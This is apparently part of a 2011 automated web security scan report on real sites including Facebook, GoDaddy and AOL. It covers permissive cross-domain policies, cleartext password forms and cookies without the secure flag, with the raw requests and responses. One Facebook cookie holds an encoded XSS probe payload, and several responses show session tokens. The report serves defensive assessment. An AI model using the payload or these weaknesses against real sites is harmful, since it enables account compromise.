   <allow-access-from domain="www.inyour.facebook.com" />
...[SNIP]...

3.15. http://www.ft.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ft.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "51d-4ba8ec18"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 1309
Date: Thu, 05 May 2011 10:57:11 GMT
Connection: close
Last-Modified: Tue, 23 Mar 2010 16:28:08 GMT
Server: Apache/1.3.37
Content-Type: text/xml
Keep-Alive: timeout=1, max=120

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ft.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.tangozebra.com" secure="true"/>
<allow-access-from domain="*.euronews.net" secure="true"/>
<allow-access-from domain="*.google.com" secure="true"/>
<allow-access-from domain="*.gstatic.com" secure="true"/>
<allow-access-from domain="*.doubleclick.net" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="false"/>
<allow-access-from domain="*.dartmotif.net" secure="false"/>
<allow-access-from domain="*.doubleclick.net" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="true"/>
<allow-access-from domain="*.doubleclick.com" secure="false"/>
<allow-access-from domain="*.2mdn.net" secure="true"/>
<allow-access-from domain="*.dartmotif.net" secure="true"/>
<allow-access-from domain="*.googlesyndication.com" secure="true"/>
<allow-access-from domain="*.brightcove.com" secure="true"/>
<allow-access-from domain="*.google-analytics.com" secure="true"/>
...[SNIP]...

3.16. https://www.godaddy.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.godaddy.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Thu, 05 May 2011 10:57:19 GMT
Connection: close
Content-Length: 150

<?xml version="1.0"?><cross-domain-policy><allow-access-from domain="*.wsimg.com" /><allow-access-from domain="*.godaddy.com" /></cross-domain-policy>

3.17. http://www.ibm.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ibm.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ibm.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:38 GMT
Server: IBM_HTTP_Server
Last-Modified: Sat, 01 Nov 2008 20:30:18 GMT
ETag: "153-95044a80"
Accept-Ranges: bytes
Content-Length: 339
epKe-Alive: timeout=10, max=8
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: crossdomain.xml,v 1.3 2008/08/08 15:47:24 krusch Ex
...[SNIP]...
<allow-access-from domain="*.ibm.com" />
<allow-access-from domain="*.lotus.com" />
...[SNIP]...

3.18. http://www.marketwatch.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketwatch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.marketwatch.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 04 Nov 2010 12:22:38 GMT
Accept-Ranges: bytes
ETag: "07be2f71a7ccb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp04
Date: Thu, 05 May 2011 10:58:41 GMT
Connection: keep-alive
Content-Length: 1625

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*.marketwatch.com" />
<allow-access-from domain="*.mktw.net" />
<allow-access-from domain="creatives.doubleclick.net" secure="true" />
...[SNIP]...
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="m.doubleclick.net"/>
<allow-access-from domain="m2.doubleclick.net"/>
<allow-access-from domain="m3.doubleclick.net"/>
<allow-access-from domain="m.2mdn.net"/>
<allow-access-from domain="m2.2mdn.net"/>
<allow-access-from domain="betadfa.doubleclick.net"/>
<allow-access-from domain="dfa.doubleclick.net"/>
<allow-access-from domain="motifcdn2.doubleclick.net"/>
<allow-access-from domain="ad.doubleclick.net"/>
<allow-access-from domain="m1.2mdn.net"/>
<allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.2mdn.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.allthingsd.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="*.wsj.net"/>
<allow-access-from domain="*.dowjones.net"/>
<allow-access-from domain="*.llnwd.net"/>
<allow-access-from domain="*.wsj.com"/>
<allow-access-from domain="*.wsjradio.com"/>
<allow-access-from domain="*.barrons.com"/>
<allow-access-from domain="aes.online.edit.dowjones.net"/>
<allow-access-from domain="api.bizographics.com"/>
...[SNIP]...

3.19. http://www.mmafighting.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mmafighting.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 1400
Keep-Alive: timeout=5, max=999791
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy><allow-access-from domain="*.aol.com"/><allow-access-from domain="*.digitalcity.com"/><allow-access-from domain="*.aolcdn.com"/><allow-access-from domain="cdn-startpage.aol.com"/><allow-access-from domain="startpage.aol.com"/><allow-access-from domain="*.channels.aol.com"/><allow-access-from domain="*.channel.aol.com"/><allow-access-from domain="*.web.aol.com"/><allow-access-from domain="*.my.aol.com"/><allow-access-from domain="*.news.aol.com"/><allow-access-from domain="iamalpha.com"/><allow-access-from domain="imakealpha.com"/><allow-access-from domain="aimcreate.mdat.aim.com:30100 "/><allow-access-from domain="*.spinner.com"/><allow-access-from domain="*.popeater.com"/><allow-access-from domain="*.theboombox.com"/><allow-access-from domain="*.opticalcortex.com"/><allow-access-from domain="static.stats.com"/><allow-access-from domain="*.moviefone.com"/><allow-access-from domain="*.aolhealth.com"/><allow-access-from domain="*.walletpop.com"/><allow-access-from domain="*.stats.com"/><allow-access-from domain="*.lightningcast.com"/><allow-access-from domain="*.yourminis.com"/><allow-access-from domain="*.fanhouse.com"/><allow-access-from domain="*.blogsmithmedia.com"/><allow-access-from domain="*.beta.fanhouse.com"/>
...[SNIP]...

3.20. http://www.moviefone.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.moviefone.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.moviefone.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:49 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999987
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.21. http://www.netvibes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.netvibes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.netvibes.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Thu, 05 May 2011 10:58:52 GMT
Content-Type: text/xml
Connection: close
X-Men: 52
Accept-Ranges: bytes
Last-Modified: Wed, 27 May 2009 07:32:50 GMT
Content-Length: 211
X-slb: 1
X-Jobs: http://about.netvibes.com/jobs.php looking for a sysadmin :)

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.meebo.com" />
</cross-dom
...[SNIP]...

3.22. http://www.pageflakes.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.pageflakes.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pageflakes.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Length: 266
Content-Type: text/xml
Last-Modified: Sat, 30 Aug 2008 02:30:03 GMT
Accept-Ranges: bytes
ETag: "462324f48ac91:430e2"
Server: Microsoft-IIS/6.0
From: web10
Date: Thu, 05 May 2011 10:58:53 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pageflakes.com"/>
<allow-access-from domain="*.livevideo.com"/>
<allow-access-from domain="*.meandmypage.com"/>
<allow-access-from domain="*.solesite.com"/>
...[SNIP]...

3.23. http://www.popeater.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.popeater.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.popeater.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:58:54 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 317
Keep-Alive: timeout=5, max=999984
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
<allow-access-from domain="*.aolcdn.com" />
...[SNIP]...

3.24. http://www.realtytrac.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.realtytrac.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.realtytrac.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Expires: Fri, 09 Oct 2020 00:00:00 GMT
Last-Modified: Fri, 21 May 2010 19:20:10 GMT
Accept-Ranges: bytes
ETag: "011ea11af9ca1:0"
Server: Microsoft-IIS/7.5
P3P: policyref="/w3c/p3p.xml",CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Date: Thu, 05 May 2011 01:00:22 GMT
Connection: close
Content-Length: 170

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.realtytrac.com" />
<allow-access-from domain="*.erealinvestor.com" />
</cross-domain-policy>

3.25. http://www.tuaw.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.tuaw.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: www.tuaw.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 13:06:15 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 269
Keep-Alive: timeout=5, max=1000000
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.blogsmithmedia.com" />
...[SNIP]...

3.26. http://www.truveo.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.truveo.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.truveo.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:01 GMT
Server: Apache
Last-Modified: Wed, 04 May 2011 21:11:01 GMT
Accept-Ranges: bytes
Content-Length: 100
Access-Control-Allow-Oritin: *
Keep-Alive: timeout=15, max=93
Connection: Keep-Alive
Content-Type: text/xml

<cross-domain-policy>
<allow-access-from domain="admin.brightcove.com" />
</cross-domain-policy>

4. Silverlight cross-domain policy previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.aol.com
Path:	/clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: www.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:22 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 314
Keep-Alive: timeout=5, max=56
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5. Cleartext submission of password previous next
There are 4 instances of this issue:

http://www.facebook.com/
http://www.facebook.com/r.php
http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/
http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

5.1. http://www.facebook.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/

The form contains the following password field:

reg_passwd__

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.69
Connection: close
Date: Thu, 05 May 2011 11:43:08 GMT
Content-Length: 30906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="reg_box"><form method="post" id="reg" name="reg" onsubmit="return function(event){return false;}.call(this,event)!==false && Event.__inlineSubmit(this,event)"><input type="hidden" autocomplete="off" name="post_form_id" value="76bac92d00ddc3f918cce3ae87a1177e" />
...[SNIP]...
<div class="field_container"><input type="password" class="inputtext" id="reg_passwd__" name="reg_passwd__" value="" /></div>
...[SNIP]...

5.2. http://www.facebook.com/r.php previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/r.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.facebook.com/r.php

The form contains the following password field:

reg_passwd__

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

5.3. http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mmafighting.com/2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/

The form contains the following password field:

AuthorPassword

Request

GET /2011/05/03/sources-fedor-hendo-fight-could-be-announced-within-24-72-hours/ HTTP/1.1
Host: www.mmafighting.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GEO-173_193_214_243=usa%3A%3Adallas%3A%3A032.787%3A%3A-096.799%3A%3Abroadband%3A%3Atx; s_pers=%20s_getnr%3D1304575044556-New%7C1367647044556%3B%20s_nrgvo%3DNew%7C1367647044557%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; comment_by_existing=deleted;

Response

5.4. http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.mmafighting.com
Path:	/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.mmafighting.com/2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545

The form contains the following password field:

AuthorPassword

Request

GET /2011/05/04/former-nhl-enforcer-donald-brashear-to-fight-at-ringside-mma-11/?icid=maing-grid7%7Cmain5%7Cdl4%7Csec3_lnk1%7C60545 HTTP/1.1
Host: www.mmafighting.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

6. SSL cookie without secure flag set previous next
There are 17 instances of this issue:

https://www.fightmagazine.com/mma-magazine/subscribe.asp
https://www.godaddy.com/
https://www.godaddy.com/domains/search.aspx
https://www.facebook.com/
https://www.facebook.com/ajax/intl/language_dialog.php
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/h02332
https://www.facebook.com/help/contact.php
https://www.facebook.com/login.php
https://www.facebook.com/pages/ToP-SeCNeT/195242630519520
https://www.facebook.com/pages/create.php
https://www.facebook.com/r.php
https://www.facebook.com/recover.php
https://www.godaddy.com/gdshop/hosting/landing.asp
https://www.godaddy.com/gdshop/registrar/search.asp
https://www.godaddy.com/gdshop/website.asp

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

6.1. https://www.fightmagazine.com/mma-magazine/subscribe.asp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.fightmagazine.com
Path:	/mma-magazine/subscribe.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

ASPSESSIONIDCSSSACAT=OHOCLKNAGCJNELEGAPIKBNJM; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mma-magazine/subscribe.asp HTTP/1.1
Host: www.fightmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.2. https://www.godaddy.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=2ot03x55n2cjbhmswxqzgtjx; path=/; HttpOnly
flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:18 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:18 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/default.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=60; domain=godaddy.com; path=/
HPBackground=DanicaImageOne; path=/
HPBackground=DanicaImageOne; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.3. https://www.godaddy.com/domains/search.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.godaddy.com
Path:	/domains/search.aspx

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

ASP.NET_SessionId=eaduka553tx3nvvrjumr4n23; path=/; HttpOnly
flag1=cflag=us; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
currency1=potableSourceStr=USD; domain=godaddy.com; expires=Fri, 04-May-2012 10:57:20 GMT; path=/
currencypopin1=cdisplaypopin=false; domain=godaddy.com; expires=Sat, 05-May-2012 10:57:20 GMT; path=/
traffic=cookies=1&referrer=&sitename=www.godaddy.com&page=/domains/search.aspx&server=M1PWCORPWEB174&status=200 OK&querystring=&shopper=&privatelabelid=1&isc=&clientip=173.193.214.243&referringpath=&referringdomain=&split=47; domain=godaddy.com; path=/
BlueLithium_domainsearch=ugqjxgqhxeehnjxdoawhyhhaljygwjcd; domain=godaddy.com; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /domains/search.aspx HTTP/1.1
Host: www.godaddy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

6.4. https://www.facebook.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.195.126
Connection: close
Date: Thu, 05 May 2011 11:43:17 GMT
Content-Length: 30968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

6.5. https://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ajax/intl/language_dialog.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

6.6. https://www.facebook.com/h02332 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.facebook.com
Path:	/h02332

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

reg_fb_gate=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com
reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fh02332; path=/; domain=.facebook.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /h02332 HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.facebook.com/h02332
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-; lsd=T19_s
Content-Type: application/x-www-form-urlencoded
Content-Length: 779

post_form_id=76bac92d00ddc3f918cce3ae87a1177e&lsd=T19_s&captcha_persist_data=AQBeontrT_F0tu7Ahqufh0Nz_L57GC3z01jTVMayUpXS3RtmLp7gUAIWBcPgu66CfwG3bDSmtoZxxdfxY8Wj0BFJoRTL5R9qmmmGtfS7XvxLkrDktAk6_X9BzWt
...[SNIP]...

Response

